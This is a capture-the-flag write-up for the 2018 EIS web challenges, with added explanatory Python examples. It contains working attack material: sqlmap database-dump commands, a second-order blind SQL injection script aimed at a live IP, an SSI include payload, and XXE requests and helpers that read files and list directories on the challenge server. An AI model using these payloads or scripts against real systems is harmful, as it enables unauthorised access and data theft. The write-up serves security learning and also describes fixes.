2018 EIS Web writeup
SimpleBBS
http://bbs.sec.zju.edu.cn/
Challenge analysis:
1. The login page throws a database error.
2. Export the request from Burp and feed it to sqlmap.
```
sqlmap -r bbs.txt --dbs
```
```
available databases [2]:
[*] bbs
[*] information_schema
```
```
sqlmap -r bbs.txt -D "bbs" --tables
```
```
Database: bbs
[7 tables]
+----------+
| admin    |
| articles |
| comments |
| flag     |
| messages |
| sections |
| users    |
+----------+
```
```
sqlmap -r bbs.txt -D "bbs" -T "flag" -C "f" --dump
```
```
# By the time I tested, the flag had already been removed....
Database: bbs
Table: flag
[1 entry]
+---------+
| f       |
+---------+
| <blank> |
+---------+
```
SimpleBlog
Challenge description:
SimpleBlog
Challenge analysis:
At first I kept looking for a file-inclusion bug so I could read the source; when I really could not find one, I sat down and worked the challenge properly. It turns out a straightforward second-order injection is enough: the username is stored at registration and only reaches a query later, when an answer is submitted. If the injected content is present, the score for that answer comes back as 0, which is what the script keys on: a response without 'Your grades is 0' means the injected condition was true.
```python
# Ported from the original Python 2 script to Python 3; the logic is unchanged.
import urllib.parse

import requests

flag = ""
register = 'http://210.32.4.20/register.php'
login = 'http://210.32.4.20/login.php'
answer = 'http://210.32.4.20/answer.php'
logout = 'http://210.32.4.20/logout.php'

# One character of the flag per outer iteration (this run started at position 3),
# one candidate code point per inner iteration.
for i in range(3, 50):
    for j in range(32, 126):
        print("i:", i, "j:", chr(j))
        req = requests.Session()
        # Boolean-blind condition on character i of the flag. It is stored as the
        # username at registration and only fires when answer.php reuses it in a query.
        payload = "' or if((ascii(substr((select flag from flag)," + str(i) + ",1))=" + str(j) + "),1,0)='1' or '"
        post_answer = {'1.a': 'on'}
        login_data = {'username': urllib.parse.quote(payload), 'password': 'zeroyu'}
        r = req.post(register, data=login_data)
        lin = req.post(login, data=login_data)
        ans = req.post(answer, data=post_answer)
        # A true condition gives a non-zero grade, so the absence of the
        # "grades is 0" message means chr(j) is the next character.
        if 'Your grades is 0' not in ans.text:
            f = chr(j)
            print(f)
            flag = flag + f
            print(flag)
            break
        lout = req.get(logout)
```
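To make the second-order path concrete, here is an added example (not from the writeup) that simulates the challenge's backend with an in-memory SQLite database and runs the same boolean-blind extraction against it offline. The `users` and `flag` table names follow the writeup's query; the flag value, the `register`/`grade` functions and the `CASE WHEN ... unicode()` form of the condition are assumptions, the last because SQLite has no `if()`/`ascii()`. The insert itself is parameterised and safe; the bug is that the stored value is later concatenated into a second query.

```python
import sqlite3

# Constructed flag for the simulated backend (not the challenge's real flag).
FLAG = "EIS{second_order_demo}"


def make_db():
    """In-memory stand-in for the challenge database: a users table and a flag table."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE users (username TEXT, password TEXT);"
        "CREATE TABLE flag (flag TEXT);"
    )
    db.execute("INSERT INTO flag VALUES (?)", (FLAG,))
    return db


def register(db, username, password):
    """register.php: the insert is parameterised, so the payload is stored verbatim and harmlessly."""
    db.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password))


def grade(db, username):
    """answer.php: the stored username is read back and spliced into a second query.

    That second query is where the injection fires (second-order). The grade is
    non-zero exactly when the spliced WHERE clause matches at least one row.
    """
    row = db.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()
    if row is None:
        return 0
    stored = row[0]
    sql = "SELECT 1 FROM users WHERE username = '%s'" % stored  # vulnerable concatenation
    return 1 if db.execute(sql).fetchall() else 0


def blind_payload(pos, code):
    """Boolean-blind probe: true iff character `pos` of the flag has code point `code`.

    Same shape as the writeup's MySQL payload, with CASE/unicode() in place of if()/ascii().
    """
    return (
        "' or (CASE WHEN unicode(substr((SELECT flag FROM flag),%d,1))=%d "
        "THEN 1 ELSE 0 END)=1 or '" % (pos, code)
    )


def extract_flag(db, max_len=64):
    """Recover the flag one character at a time through the grade oracle."""
    flag = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):
            payload = blind_payload(pos, code)
            register(db, payload, "x")        # step 1: store the payload
            if grade(db, payload) != 0:       # step 2: trigger it and read the oracle
                flag += chr(code)
                break
        else:
            break  # no printable character matched: past the end of the flag
    return flag


if __name__ == "__main__":
    print(extract_flag(make_db()))
```

Past the end of the flag, `substr()` yields an empty string and `unicode('')` is NULL, so no candidate matches and the outer loop stops; the writeup's script instead runs to a fixed length and relies on the operator to notice. The fix is the same in both cases: parameterise the second query too, because escaping at insert time does nothing for a value that is read back and concatenated later.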
SimpleServerInjection
Challenge description:
SimpleServerInjection, SSI, flag in current directory
Challenge analysis:
Recognised it as SSI, and the hint says to read the flag file. With the usual payload, everything after the # was truncated, so I used URL encoding to get it past.

Payload:
```
<!--%23include+virtual%3D"flag"+-->
```
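Why the raw directive loses everything after the `#`, as an added example that is not part of the writeup: in a URL, a bare `#` starts the fragment, which browsers and most HTTP clients never send to the server, so a directive submitted in a GET parameter arrives as just `<!--`. The helpers below build the directive, encode it the way the payload above is encoded, and show what the server-side parameter looks like in each case. The assumption that the payload travelled in a GET query string (parameter name `q`, host `host`) is mine; the writeup does not say where it was injected.

```python
from urllib.parse import parse_qs, quote_plus, urlsplit


def ssi_include(path):
    """Apache-style SSI directive that inlines the file at `path`."""
    return '<!--#include virtual="%s" -->' % path


def encode_for_query(directive):
    """Percent-encode the directive for a GET parameter: '#' -> %23, '=' -> %3D, ' ' -> '+'.

    '<', '>', '!' and '"' are left alone so the result matches the writeup's payload byte for byte.
    """
    return quote_plus(directive, safe='<>!"')


def param_as_seen_by_server(url, name):
    """Value of parameter `name` after URL splitting: a raw '#' starts the fragment, which is dropped."""
    query = urlsplit(url).query
    return parse_qs(query, keep_blank_values=True).get(name, [""])[0]


if __name__ == "__main__":
    base = "http://host/index.shtml?q="  # assumed injection point
    raw = base + ssi_include("flag")
    encoded = base + encode_for_query(ssi_include("flag"))
    print(param_as_seen_by_server(raw, "q"))      # truncated at the '#'
    print(param_as_seen_by_server(encoded, "q"))  # full directive reaches the SSI handler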
References:
https://junookyo.blogspot.com/2012/03/shtml-bypass-view-symlink-server-side.html
https://www.secpulse.com/archives/66934.html
http://xdxd.love/2015/12/09/ssi%E6%BC%8F%E6%B4%9E%E4%BB%8B%E7%BB%8D/
SimpleExtensionExplorerInjection
Challenge description:
SimpleExtensionExplorerInjection, XXE, /flag
http://210.32.4.21:8080/www/index.html
Challenge analysis:
1. Capturing the traffic in Burp shows the data is sent as JSON.
2. Change the Content-Type header to XML and try POSTing an XML body instead. The request and response below show an XXE vulnerability: the error body (the timestamp/status/error/message/path JSON) is Spring Boot's default error response, and the SAXParseException inside it shows the body was handed to a real XML parser. The complaint about markup after the root element only means the probe has two top-level elements and no root.
Request
```http
POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 73
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<name>zzz</name>
<age>zzz</age>
```
Response
```http
HTTP/1.1 500
Content-Type: application/json;charset=UTF-8
Date: Fri, 16 Nov 2018 09:17:40 GMT
Connection: close
Content-Length: 254

{"timestamp":"2018-11-16T09:17:40.797+0000","status":500,"error":"Internal Server Error","message":"org.xml.sax.SAXParseException; lineNumber: 3; columnNumber: 2; The markup in the document following the root element must be well-formed.","path":"/www/"}
```
3. Following the hint /flag, read the file directly with an external entity.
Request
```http
POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 151
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flag" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>
```
Response:
```http
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 09:21:23 GMT
Connection: close

Received name: name, age: EIS{bce52c116d589ae9472e59a162cc90e2}
```
References:
https://blog.netspi.com/playing-content-type-xxe-json-endpoints/
https://thief.one/2017/06/20/1/
SimplePrintEventLogger
Challenge description:
SimplePrintEventLogger, same server as SimpleExtensionExploreInjection, RCE, flag in /
http://210.32.4.21:8080/www/index.html
Challenge analysis:
Same server as the previous challenge, and the flag is in the root directory, so it is enough to browse around by hand. Pointing the external entity at file:/// works because Java's file: URL handler returns a directory listing when the target is a directory, so the same XXE enumerates / without any need for code execution.
Request
```http
POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 147
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>
```
Response
```http
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 169
Date: Fri, 16 Nov 2018 16:46:04 GMT
Connection: close

Received name: name, age: .dockerenv
bin
boot
dev
docker-java-home
etc
flag
flagvvvvvaaaagegsgag2333
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
```
Read flagvvvvvaaaagegsgag2333
Request
```http
POST /www/ HTTP/1.1
Host: 210.32.4.21:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://210.32.4.21:8080/www/index.html
Content-Type: application/xml; charset=UTF-8
Content-Length: 171
Connection: close

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///flagvvvvvaaaagegsgag2333" >]>
<root>
<name>name</name>
<age>&xxe;</age>
</root>
```
Response
```http
HTTP/1.1 200
Content-Type: text/plain;charset=UTF-8
Content-Length: 64
Date: Fri, 16 Nov 2018 16:47:38 GMT
Connection: close

Received name: name, age: EIS{f501e9c5323c560b0a40192ce9b7ad38}
```
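The parser probe, the file read from SimpleExtensionExplorerInjection and the directory listing above, wrapped in Python helpers as an added example that is not part of the writeup. The endpoint URL, the Content-Type header and the XML bodies are the writeup's; the function names are mine, `FAKE_FS` and the flag strings in it are constructed so the helpers can be exercised offline against a stand-in for the server, and `send_http` (which needs the `requests` package) is only used when a real target is supplied.

```python
import re

URL = "http://210.32.4.21:8080/www/"  # endpoint from the writeup
XML_HEADERS = {"Content-Type": "application/xml; charset=UTF-8"}


def xxe_body(resource):
    """XML document whose external entity resolves `resource` into the <age> element."""
    return (
        '<?xml version="1.0" encoding="UTF-8" ?>\n'
        '<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "%s" >]>\n'
        '<root><name>name</name><age>&xxe;</age></root>' % resource
    )


def send_http(body):
    """Deliver the body with an XML Content-Type; the endpoint normally speaks JSON."""
    import requests  # imported here so the offline helpers work without it
    return requests.post(URL, data=body.encode("utf-8"), headers=XML_HEADERS, timeout=10).text


def parse_received(text):
    """Split 'Received name: <name>, age: <age>' into (name, age)."""
    m = re.match(r"Received name: (.*?), age: (.*)\Z", text, re.S)
    if m is None:
        raise ValueError("unexpected response: %r" % text[:80])
    return m.group(1), m.group(2)


def probe_parser(send=send_http):
    """Send XML with two top-level elements; a SAXParseException in the reply means an XML parser saw it."""
    reply = send('<?xml version="1.0" encoding="UTF-8" ?>\n<name>zzz</name>\n<age>zzz</age>')
    return "SAXParseException" in reply


def read_file(path, send=send_http):
    """Return the contents of `path` on the server, reflected back through the <age> field."""
    _, age = parse_received(send(xxe_body("file://" + path)))
    return age


def list_dir(path, send=send_http):
    """Java's file: handler returns one entry per line for a directory; split it into names."""
    return read_file(path, send).split()


# Constructed stand-in for the server's filesystem (not the challenge's real files or flags).
FAKE_FS = {
    "file:///": ".dockerenv\nbin\netc\nflag\nflag_second_copy\nroot\n",
    "file:///flag": "EIS{constructed_flag_one}",
    "file:///flag_second_copy": "EIS{constructed_flag_two}",
}


def fake_server(body):
    """Minimal model of the target: a SAXParseException-style error for rootless XML, otherwise the entity's content."""
    m = re.search(r'SYSTEM "([^"]+)"', body)
    if m is None or "<root>" not in body:
        return ('{"status":500,"message":"org.xml.sax.SAXParseException; '
                'The markup in the document following the root element must be well-formed."}')
    return "Received name: name, age: " + FAKE_FS.get(m.group(1), "")


if __name__ == "__main__":
    # Swap fake_server for send_http to run against a live target.
    print(probe_parser(fake_server))
    print(list_dir("/", fake_server))
    print(read_file("/flag", fake_server))
```

Two things the helpers make explicit: the request never needs RCE, since an entity pointing at a directory already yields its listing, and the only reason the attack works is that the server resolves external entities and then echoes the parsed field. Disabling DTDs (or at least external entities) in the server's XML parser closes both the file read and the listing.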